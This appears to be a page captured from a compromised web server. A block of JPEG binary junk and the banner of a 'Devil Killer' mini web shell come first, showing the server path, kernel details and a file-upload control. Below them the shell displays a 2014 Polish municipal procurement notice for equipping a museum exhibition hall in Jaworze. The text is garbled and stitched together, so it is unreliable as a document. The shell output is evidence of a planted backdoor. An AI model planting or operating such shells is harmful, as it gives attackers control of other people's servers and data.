JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140610/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140610/195358-N-2014.html

<p class="kh_header"><b>Jaworze: Muzeum Fauny i Flory Morskiej i Śródlądowej w Jaworzu - 
ETAP II - Wyposażenie Sali Wystawienniczej.</b><br>
<b>Numer ogłoszenia: 195358 - 2014; data zamieszczenia: 10.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Jaworze , ul. Zdrojowa 82, 43-384 Jaworze, woj. śląskie, tel. 33 828 66 00, faks 33 828 66 01.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Muzeum Fauny i Flory Morskiej i Śródlądowej w Jaworzu - 
ETAP II - Wyposażenie Sali Wystawienniczej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Muzeum Fauny i Flory Morskiej i Śródlądowej w Jaworzu - ETAP II - Wyposażenie 
       Sali Wystawienniczej polegające na aranżacji plastyczno-architektonicznej wystawy stałej zgromadzonych eksponatów 
       mających związek z fauną i florą morską.
W ramach przedmiotu zamówienia należy wykonać:
                         1. dostawa wraz z montażem przeszklonych gablot  wystawowych:
                                    - Gablota G1 - 1 kpl
                                    - Gablota G2 stolikowa - 2 kpl
                                    - Gablota G3 stolikowa - 1 kpl
                                    - Gablota G4 - 1 kpl
                                    - Gablota G5 - 1 kpl
                                    - Gablota G6 wisząca - 2 kpl
                                    - Ścianka dekoracyjna - 1 kpl
                      2. druki materiałów wielkoformatowych - plansze tekstowe, plansze informacyjne,

                     UWAGA
                    Treść poszczególnych plansz tekstowych oraz plansz informacyjnych zostanie  Wykonawcy przekazana 
                    przez Zamawiającego po podpisaniu umowy na realizację przedmiotu zamówienia.
 
                     3. multimedia
W ramach przedmiotu zamówienia należy zapewnić dostawę wraz z montażem urządzeń nie objętych 
                      dofinansowaniem w ramach ww. programu operacyjnego lecz finansowanych wyłącznie z budżetu gminy.
SPECYFIKACJA PRZEDMIOTU ZESTAW MULTIMEDIALNY
                                   Zestaw składa się z tablicy interaktywnej, projektora krótkoogniskowego, stacjonarnego zestawu 
                                   komputerowego, monitora oraz kompletnego okablowania wszystkich elementów.

TABLICA INTERAKTYWNA		
Rozdzielczość: 17200 x 9200
Format: minimum 16:9
Powierzchnia aktywna: minimum 2172mm x 1175mm ,86in x 46in
Wewnętrzna rozdzielczość: minimum 2600 punktów na cal
Rozdzielczość wyjściowa: minimum 200 punktów na cal
Szybkość śledzenia: minimum 200 cali na sekundę
Interfejs użytkownika: bezbateryjny pisak elektroniczny zapewniający pełną zgodność sprzętową z myszką komputerową 
Ilość dołączonych urządzeń wskazujących: minimum: 2 pióra elektroniczne nauczycielskie, 2 pióra elektroniczne uczniowskie,
Technologia digitalizacji: elektromagnetyczna pasywna
Zasilanie: urządzenie zasilane bezpośrednio z portu USB
Podłączenie do komputera: USB - dołączony kabel USB (min. 5m) lub opcjonalnie poprzez łącze bezprzewodowe
Porty dla urządzeń peryferyjnych: minimum 2 x USB
Tryb pracy Dual-User: wbudowany
Wbudowany system dźwiękowy: wbudowany

PROJEKTOR KRÓTKOOGNISKOWY	
Rozdzielczość	WXGA 1280 x 800
Kontrast	4000:1
Technologia	DLP
Żywotność źródła światła [h]	minimum 4500 
Moc/źródło światła [W]	220
Obiektyw	minimum F= 2,5, f = 6,5 mm
Zoom/Fokus	0,49 (95 @1 m)
Przekątna	minimum 80 - 300cal
Wbudowany głośnik	TAK
Wejścia wideo	HDMI V1.3 x 1, Computer in (D-sub 15pin) x 2 (dzielone z Component), Composite Video in x 1, S-Video in (Mini DIN 4pin) x 1
Wyjścia wideo	Monitor out (D-sub 15pin) x1
Wejścia audio	minimum Audio in (Mini Jack) x 2, Audio L/R in (RCA) x 2
Wyjścia audio	minimum Audio out (Mini Jack) x 1
Porty komunikacyjne	LAN (RJ45) x 1 (LAN Control), USB (Type Mini B) x 1, RS232 (DB-9pin) x 1
Wyposażenie standardowe	Pilot z bateriami, Kabel zasilający, Instrukcja CD, Karta Gwarancyjna, Kabel VGA (D-sub 15pin)
Wyposażenie opcjonalne	Lampa, Mocowanie, Torba
Kompatybilność HDTV	480i, 480p, 576i, 576p, 720p, 1080i, 1080p

STACJONARNY ZESTAW KOMPUTEROWY		
Typ procesora: w testach na stronie http:www.benchmark.plstrefaranking-procesorow nie mniej niż 3,5 pkt wydajności 
System operacyjny: Windows 7 Professional
Dodatkowe oprogramowanie: Microsoft Office 2013, program antywirusowy
Zainstalowana pamięć RAM: minimum 6 GB
Dysk twardy: hybrydowy (z wbudowaną pamięcią flash)
Gwarancja: 36 m-cy
Pojemność dysku: minimum 1 TB
Karta graficzna: niezintegrowana, z własną pamięcią minimum 1 GB
Porty Video: minimum 1 x VGA (15 pin D-Sub), 1 x DVI-D, 1 x HDMI
Karta dźwiękowa: HD Audio 8-kanałowa
Napęd optyczny: DVD RW
Karta sieci LAN: TAK
Karta bezprzewodowa: TAK
Złącza zewnętrzne: 6 x USB (w tym minimum 2 x USB 3.0) 3 gniazdka audio wejście liniowe, wyjście liniowe mikrofon, 
Typ obudowy: desktop
Kolor: Czarny
Mysz, Klawiatura: TAK
Moc zasilacza: 250 W

MONITOR		
Typ panelu LCD: TFT-LCD
Typ wyświetlacza: System W-LED
Rozmiar panelu: minimum 59,9 cm  23,6 cala
Optymalna rozdzielczość: minimum 1920 x 1080 przy 60 Hz
Czas reakcji (typowy): 5 ms
Możliwości połączeń
Wejście sygnału: VGA (analogowe), DVI-D (cyfrowe HDCP), HDMI (cyfrowe HDCP)
Sygnał wejściowy synchronizacji: Oddzielna synchronizacja, Synchronizacja na zielonym
Wejście,wyjście audio: Wejście PC audio, Wyjście na słuchawki
Udogodnienia
Wbudowane audio: 2 x 2,0 W
Języki menu ekranowego: polski
Podstawa
regulacja pionowa oraz pozioma
SPECYFIKACJA PRZEDMIOTU NAGŁOŚNIENIA SALI
                                Zestaw składa się z miksera, dwóch monitorów aktywnych (kolumn), dwóch statywów kolumnowych, 
                                zestawu bezprzewodowego podwójnego z dwoma mikrofonami dynamicznymi oraz okablowania 
                                wszystkich elementów.

MIKSER: 		
Wejścia mikrofonowo-liniowe: 10 
Wejścia stereo: 3 podwójne 
Filtr dolnozaporowy: 100Hz 
Korekcja barwy: TAK
Gniazda insertowe: TAK
Tłumiki: minimum 80mm z osłoną przeciw kurzową 
Wyjścia: Main Out LR, Mono Out, Alt Out, Rec Out 

MONITOR AKTYWNY (KOLUMNA) - 2 SZTUKI:	
Zastosowanie: odsłuch koncertowy, studyjny
Komponenty: 12-2,5 VC ND; 1-1 VC cal
Zakres pracy: 50Hz-20kHz 
Skuteczność SPL: minimum 99 dB 
Moc wyjściowa: minimum 500 W 

STATYW KOLUMNOWY - 2 SZTUKI		
Standardowy statyw kolumnowy, zapewniający montaż kolumn będących przedmiotem niniejszego zamówienia.
Materiał - stal 
Płynna regulacja wysokości - 1300mm do 2100mm 

ZESTAW BEZPRZEWODOWY PODWÓJNY Z 2 MIKROFONAMI DYNAMICZNYMI 
Wygodna obsługa i ustawianie kanałów poprzez automatyczne skanowanie kanałów.
Wyświetlacz LCD wyświetlający kanał, grupę i stan baterii.
Nadajnik:
Zakres częstotliwości transmisji: w przedziale 823 - 865 MHz
Kanały: minimum 90 
Typ mikrofonu: dynamiczny
Pasmo przenoszenia: w przedziale 60 Hz - 16 kHz
Moc nadawcza: minimum 10 mW
Przycisk: Power On-Off-Mute
Wskaźniki: wyświetlacz LCD
Zasilanie: bezprzewodowe (bateria, akumlator)
Odbiornik:
Zakres częstotliwości transmisji: w przedziale 823 - 865 MHz
Kanały: minimum 90
Złącza antenowe: minimum 2
Pasmo przenoszenia: w przedziale 60 Hz - 16 kHz
Przyciski: Power On-Off, Set, Up, Down, ASC
Wskaźniki: wyświetlacz LCD, 
SPECYFIKACJA PRZEDMIOTU MONITOR LCD FULL HD
Urządzenie wyświetlające: LCD
Rozmiar ekranu po przekątnej:  minimum 42
Rozdzielczość obrazu: Full HD
Współczynnik proporcji: 16:9
Głośniki: TAK
Wi-Fi: Tak
Przeglądarka internetowa: Tak
Bezprzewodowa sieć LAN: Wbudowana obsługa
Odtwarzanie z pamięci USB (zawartość): MPEG1,MPEG2PS,MPEG2TS,AVCHD,MP4Part10,MP4Part2,AVI(XVID),AVI MotionJpeg,
MOV,WMV,MKV,WEBM,3GPP,MP3,WMA,WAV,JPEG,MPO,RAW 
Instrukcja ekranowa i-Manual: Tak
Odtwarzanie z pamięci USB: Tak 
Instrukcja obsługi oraz menu: w języku polskim 
Sterowanie za pośrednictwem portu IP: Tak 
Wejścia kompozytowe wideo: minimum 1 
Złącza HDM łącznie: minimum 2
PC In ,D-Sub): minimum 1
Analogowe ejścia audio łącznie: minimum 1 
Cyfrowe wyjścia audio: minimum 1 
Wyjście audio:  minimum 1 
USB: minimum 2
Złącza sieci Ethernet: TAK
Wejście komputerowe HDMI: Tak
Uchwyt ścienny: TAK z pantografem
         Zamówienie należy wykonać zgodnie ze szczegółowym opisem przedmiotu zamówienia w postaci dokumentacji 
        projektowej - stanowiącym Załącznik nr 7 do SIWZ, tj.:
- przedmiarem robót, 
- projektem wystawy oraz opisem technicznym
W przypadku, gdy w dokumentacji projektowej opisano materiały lub urządzenia za pomocą podania nazwy ich 
        producenta, patentów lub pochodzenia, to w odniesieniu do tych materiałów lub urządzeń Zamawiający dopuszcza 
        materiały lub urządzenia równoważne. Ujęcie w ofercie, a następnie zastosowanie równoważnych materiałów lub 
        urządzeń może mieć miejsce pod warunkiem posiadania przez nie parametrów nie gorszych niż materiały lub 
        urządzenia, które one zastępują oraz że są zgodne i adekwatne z dokumentacją opisującą przedmiot zamówienia, 
        a w szczególności dokumentacją projektową i techniczną oraz odpowiadają zastosowanym rozwiązaniom 
        technologicznym. W takiej sytuacji Zamawiający wymaga udowodnienia przez Wykonawcę tego faktu, 
        a w szczególności złożenia stosownych dokumentów, potwierdzających, że te materiały lub urządzenia są równoważne..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 22.46.20.00-6, 39.15.41.10-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 08.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od wykonawców wniesienia wadium w wysokości: 6 000,00 złotych, (słownie: sześć tysięcy złotych).
Wadium może być wnoszone w jednej lub kilku następujących formach:
1.	pieniądzu;
2.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3.	gwarancjach bankowych;
4.	gwarancjach ubezpieczeniowych;
5.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 
9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275 z późn. zm.).
Termin i sposób wniesienia wadium.
8.3.1.	Wadium wnoszone w formie pieniądza należy wnieść na rachunek bankowy Urzędu Gminy Jaworze - Bank Spółdzielczy w Jasienicy
Numer konta: 87 8117 00030012 0261 2000 0030
Dokument potwierdzający wniesienie wadium w formie innej niż pieniądz należy złożyć 
w oryginale w Kasie Urzędu Gminy Jaworze, ul. Zdrojowa 82, 43-384 Jaworze, woj. śląskie, pokój 001
Wadium wnosi się przed upływem terminu składania ofert. Wadium uznaje się za wniesione, jeżeli: 
1.	wnoszone w formie pieniądza znalazło się na rachunku bankowym Zamawiającego przed upływem terminu na składanie ofert.
2.	wnoszone w pozostałych formach oryginały dokumentów zostały złożone 
w Kasie Urzędu Gminy Jaworze, ul. Zdrojowa 82, 43-384 Jaworze, woj. śląskie.
Wymagania dotyczące wadium wnoszonego w formie innej niż pieniądz.
1.	W treści wadium składanego w formie innej niż pieniądz muszą być wyszczególnione okoliczności w jakich Zamawiający zatrzymuje wadium wraz z odsetkami, określone: 
1.1.	w art. 46 ust. 4a uPzp tj. jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 uPzp nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 uPzp lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie,
1.2.	w art. 46 ust. 5 uPzp, tj.: jeżeli wykonawca, którego oferta została wybrana: 
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, 
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, 
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy. 
Wadium w formach wymienionych w art. 45 ust. 6 pkt. 2 - 5 uPzp musi być wystawione na Gminę Jaworze.
Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób reprezentacji Gwaranta. 
Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację, np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska).
Z treści gwarancji winno wynikać bezwarunkowe zobowiązanie Gwaranta (poręczyciela) do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i ust. 5 Prawa zamówień publicznych, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą. 
Wadium wniesione przez jednego z Wykonawców wspólnie ubiegających się o zamówienie uważa się za wniesione prawidłowo.
Wadium ulega zatrzymaniu w sytuacjach opisanych w pkt 8.4.1.1. i 8.4.1.2., zgodnie z art. 46 ust. 4a i 5 uPzp.
Wadium zwraca się w sytuacjach określonych w art. 46 ust. 1-2 i 4 uPzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych dostaw związanych z wyposażeniem muzeów czy sal wystawowych, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną dostawę o wartości nie mniejszej niż 150 000,00 zł brutto  wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie.
UWAGA 
Jeżeli Wykonawca dla potwierdzenia spełniania warunków udziału w postępowaniu o udzielenie zamówienia załączy dokumenty zawierające kwoty wyrażone w walutach innych niż złoty polski, Zamawiający przeliczy je na złoty polski. Do przeliczenia zostanie zastosowany średni kurs walut NBP obowiązujący w dniu wszczęcia przedmiotowego postępowania o udzielenie zamówienia publicznego. W przypadku braku publikacji kursów walut NBP obowiązujących w dniu, o którym mowa powyżej, zastosowanie ma kurs ostatnio ogłoszony przed tym dniem, zgodnie z treścią § 8 pkt 5 Uchwały nr 51/2002 Zarządu Narodowego Banku Polskiego z dnia 23 września 2002 r. w sprawie sposobu wyliczania i ogłaszania bieżących kursów walut obcych (Dz. Urz. NBP z 2002 r. nr 14, poz. 39 ze zm.).
Zamawiający dokona oceny spełniania przez Wykonawców warunków według formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie Zamawiający wymaga aby Wykonawca posiadał opłaconą polisę ubezpieczeniową od 
                odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem 
                zamówienia na sumę nie mniejszą niż 200.000,00 złotych (słownie: dwieście tysięcy złotych).

Zamawiający dokona oceny spełniania przez Wykonawców warunków według formuły spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony szczegółowo formularz Ofertowy - Załącznik Nr 5 do SIWZ.
2.	Kosztorys ofertowy.
3.	Wykonawca jest zobowiązany wykazać nie później niż na dzień składania ofert brak podstaw do wykluczenia 
z powodu niespełnienia warunku określonego w art. 24 ust. 2 pkt 5 uPzp. W tym celu Zamawiający żąda od Wykonawcy złożenia wraz z ofertą listy podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. Nr 50, poz. 331, z późn. zm.), albo informacji o tym, że nie należy do grupy kapitałowej - wzór stanowi Załącznik Nr 4 do SIWZ. Poprzez grupę kapitałową - rozumie się wszystkich przedsiębiorców, którzy są kontrolowani w sposób bezpośredni lub pośredni przez jednego przedsiębiorcę, w tym również tego przedsiębiorcę.
4.	 Zamawiający żąda od wykonawcy złożenia wraz z ofertą pełnomocnictwa udzielanego osobom podpisującym ofertę, o ile prawo do reprezentowania Wykonawcy w powyższym zakresie nie wynika wprost z dokumentu rejestrowego.
